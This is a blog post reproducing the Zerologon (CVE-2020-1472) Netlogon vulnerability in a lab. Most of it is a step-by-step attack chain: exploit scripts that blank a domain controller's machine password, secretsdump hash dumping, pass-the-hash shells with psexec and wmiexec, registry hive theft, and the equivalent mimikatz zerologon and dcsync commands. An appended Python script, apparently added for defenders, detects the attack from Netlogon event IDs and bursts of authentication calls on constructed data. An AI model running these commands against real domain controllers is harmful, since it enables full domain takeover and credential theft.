CVE-2020-1472: reproducing the Netlogon elevation of privilege vulnerability
阿新 • Published: 2020-10-20
CVE-2020-1472, Netlogon elevation of privilege vulnerability.
Vulnerability principle: when an attacker establishes a vulnerable Netlogon (MS-NRPC) secure channel with a domain controller, the flaw can be exploited to obtain domain administrator access. An attacker who successfully exploits it can run a specially crafted application on a device in the network.
Affected versions:
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)
Tool: zerologon_tester
Install the dependencies listed in requirements:
pip3 install -r requirements
How to install the latest impacket:
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
virtualenv --python=python3 impacket
source impacket/bin/activate
pip3 install .
python3 -m pip install .
Step 1: check whether the target is affected by CVE-2020-1472
python3 zerologon_tester.py <DC hostname> <DC IP>
python3 zerologon_tester.py win08 192.168.223.133
Step 2: clear the password of the domain controller machine account win08$ on the target
python3 cve-2020-1472-exploit.py <DC hostname> <DC IP>
python3 cve-2020-1472-exploit.py win08 192.168.223.133
Step 3: use impacket's secretsdump.py to dump the domain controller's hashes
secretsdump.py test.com/win08\$@192.168.223.133 -no-pass
Log on to the domain controller with pass-the-hash (PTH):
psexec.py test.com/administrator@192.168.223.133 -hashes :<administrator NT hash obtained above>
wmiexec.py test.com/administrator@192.168.223.133 -hashes :<administrator NT hash obtained above>
wmiexec.py test.com/administrator@192.168.223.133 -hashes :afffeba176210fad4628f0524bfe1942
Run system commands in the resulting shell:
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
Note: the files produced above are on the target machine and must be copied back to the attack machine:
get sam.hive
get system.hive
get security.hive
Read the files with mimikatz or secretsdump.py:
secretsdump.py -sam sam.hive -system system.hive -security security.hive LOCAL
Step 4: restore the domain controller's password
python3 reinstall_original_pw.py win08 192.168.223.133 79e0831681fc703c76295202fac36b0570a0d536a302ecc37341df6018b2918941743a443f9c19f26edc57c7b0dfa4f26c83419552bd45e5f110622582f27f649dd4a63be6e93d106f68b2d03043b4e24f076177084534594750ac8fc054bf3118f4bd73ac506cafb051d60d6fcff4852474ceebba12726551d81031e84e06d21380b96f1b0ad6d9736854af6fe20719aa70342ac77f75099521854ad02cac1901b87300172f03b1e185de535ebc22a568fd38c9ab53bd4fa3d621126af124e5eb1c7d74470add983f16420ca005156442bde6e08a4312fe510712911f408efde41dbd9ea8e2c0281872362250a07d2c
python3 secretsdump.py test.com/win08\$@192.168.223.133 -no-pass
Attacking the domain controller with mimikatz.exe
Check whether the target is affected by CVE-2020-1472:
lsadump::zerologon /target:<DC IP> /account:<DC hostname>$
lsadump::zerologon /target:192.168.223.133 /account:win08$
Clear the domain controller's password:
lsadump::zerologon /target:<DC IP> /account:<DC hostname>$ /exploit
lsadump::zerologon /target:192.168.223.133 /account:win08$ /exploit
Dump the target's hashes:
lsadump::dcsync /domain:de1ay.com /dc:dc.de1ay.com /user:krbtgt /authuser:dc$ /authdomain:de1ay.com /authpassword:"" /authntlm
Note: for local testing, DNS must point to the domain controller.
lsadump::dcsync /domain:test.com /dc:win08.test.com /user:administrator /authuser:win08$ /authdomain:test.com /authpassword:"" /authntlm
Restore the password:
lsadump::postzerologon /target:dc.de1ay.com /account:dc$
lsadump::postzerologon /target:192.168.223.133 /account:win08$
Note: when mimikatz reads hashes from the domain, DNS must be configured to point to the domain controller, and /dc: must be given the domain controller's full name (here win08.test.com). If all parameters are correct and it still fails, restart the AD service. Before restoring the password, run privilege::debug first.
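Both walkthroughs above (the impacket scripts and mimikatz) exercise the same attack: a burst of Netlogon authentication attempts against the DC followed by a machine-account password reset. The script below is an added defender-side example, not part of the original post or of either tool, showing what that activity looks like to a blue team. It triages the Netlogon event IDs 5827 to 5831 that patched domain controllers write to the System log, and it flags clients that issue an abnormal number of NetrServerReqChallenge / NetrServerAuthenticate3 calls in a short window. The event records, the DCE-RPC log rows, the hostnames, IPs and the 50-calls-per-minute threshold are all constructed or assumed for the example.

```python
"""Defender-side triage for CVE-2020-1472 (Zerologon) on constructed data.

Signal 1: Netlogon event IDs 5827-5831 (System log, source NETLOGON) that
domain controllers emit after the August 2020 update. 5827/5828 mean a
vulnerable secure channel was denied; 5829-5831 mean one was *allowed* and
the account named in the event still needs remediation.

Signal 2: a burst of NetrServerReqChallenge / NetrServerAuthenticate3 calls
from one client. The attack must retry until an all-zero ClientCredential
happens to validate (about 1 in 256 attempts), so a legitimate host never
produces hundreds of these calls in a minute.
"""
from collections import defaultdict
from datetime import datetime, timedelta

NETLOGON_EVENTS = {
    5827: ("denied", "machine account: vulnerable Netlogon secure channel denied"),
    5828: ("denied", "trust account: vulnerable Netlogon secure channel denied"),
    5829: ("allowed", "vulnerable connection allowed (enforcement not yet active)"),
    5830: ("allowed", "vulnerable connection allowed by Group Policy exception"),
    5831: ("allowed", "trust account allowed by Group Policy exception"),
}


def triage_netlogon_events(events):
    """Classify System-log records (dicts with EventID, Computer, Account).

    Returns {"denied": [...], "allowed": [...]}; the "allowed" list is the
    work queue of accounts still negotiating insecure channels.
    """
    out = {"denied": [], "allowed": []}
    for ev in events:
        info = NETLOGON_EVENTS.get(ev.get("EventID"))
        if info is None:
            continue  # unrelated System event
        verdict, note = info
        out[verdict].append({"dc": ev["Computer"], "account": ev.get("Account", "?"),
                             "event_id": ev["EventID"], "note": note})
    return out


AUTH_OPS = {"NetrServerReqChallenge", "NetrServerAuthenticate3"}


def detect_auth_bursts(records, threshold=50, window=timedelta(seconds=60)):
    """Flag sources with more than `threshold` Netlogon auth calls in any window.

    records: dicts with ts (ISO 8601), src, dst, operation, i.e. the shape of
    a DCE-RPC log row. Returns {src: peak_count_in_window} for offenders.
    """
    per_src = defaultdict(list)
    for r in records:
        if r["operation"] in AUTH_OPS:
            per_src[r["src"]].append(datetime.fromisoformat(r["ts"]))
    alerts = {}
    for src, times in per_src.items():
        times.sort()
        peak, start = 0, 0
        for end in range(len(times)):          # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            alerts[src] = peak
    return alerts


# ---- constructed sample data (not real telemetry) ----
SAMPLE_EVENTS = [
    {"EventID": 5827, "Computer": "DC01.example.test", "Account": "LEGACYHOST$"},
    {"EventID": 5829, "Computer": "DC01.example.test", "Account": "NAS01$"},
    {"EventID": 7036, "Computer": "DC01.example.test"},  # unrelated service event
]


def _sample_rpc_records():
    base = datetime(2020, 10, 20, 12, 0, 0)
    recs = []
    # legitimate host: one normal secure-channel setup (two calls)
    for i, op in enumerate(["NetrServerReqChallenge", "NetrServerAuthenticate3"]):
        recs.append({"ts": (base + timedelta(seconds=i)).isoformat(),
                     "src": "10.0.0.21", "dst": "10.0.0.5", "operation": op})
    # suspicious host: 300 alternating calls within 30 seconds
    for i in range(300):
        op = "NetrServerReqChallenge" if i % 2 == 0 else "NetrServerAuthenticate3"
        recs.append({"ts": (base + timedelta(milliseconds=100 * i)).isoformat(),
                     "src": "10.0.0.99", "dst": "10.0.0.5", "operation": op})
    return recs


SAMPLE_RPC = _sample_rpc_records()

if __name__ == "__main__":
    for verdict, items in triage_netlogon_events(SAMPLE_EVENTS).items():
        for it in items:
            print(f"[{verdict}] {it['dc']} {it['account']} (event {it['event_id']}): {it['note']}")
    for src, n in detect_auth_bursts(SAMPLE_RPC).items():
        print(f"[burst] {src}: {n} Netlogon authenticate calls in one window")
```

In practice the event triage runs over exported System-log records (for instance via a SIEM query on EventID 5827-5831), and the burst detector over a network sensor's DCE-RPC log; a 5829 event for a server that should already be patched, or any source tripping the burst rule, warrants checking that machine account's password-change history on the DC.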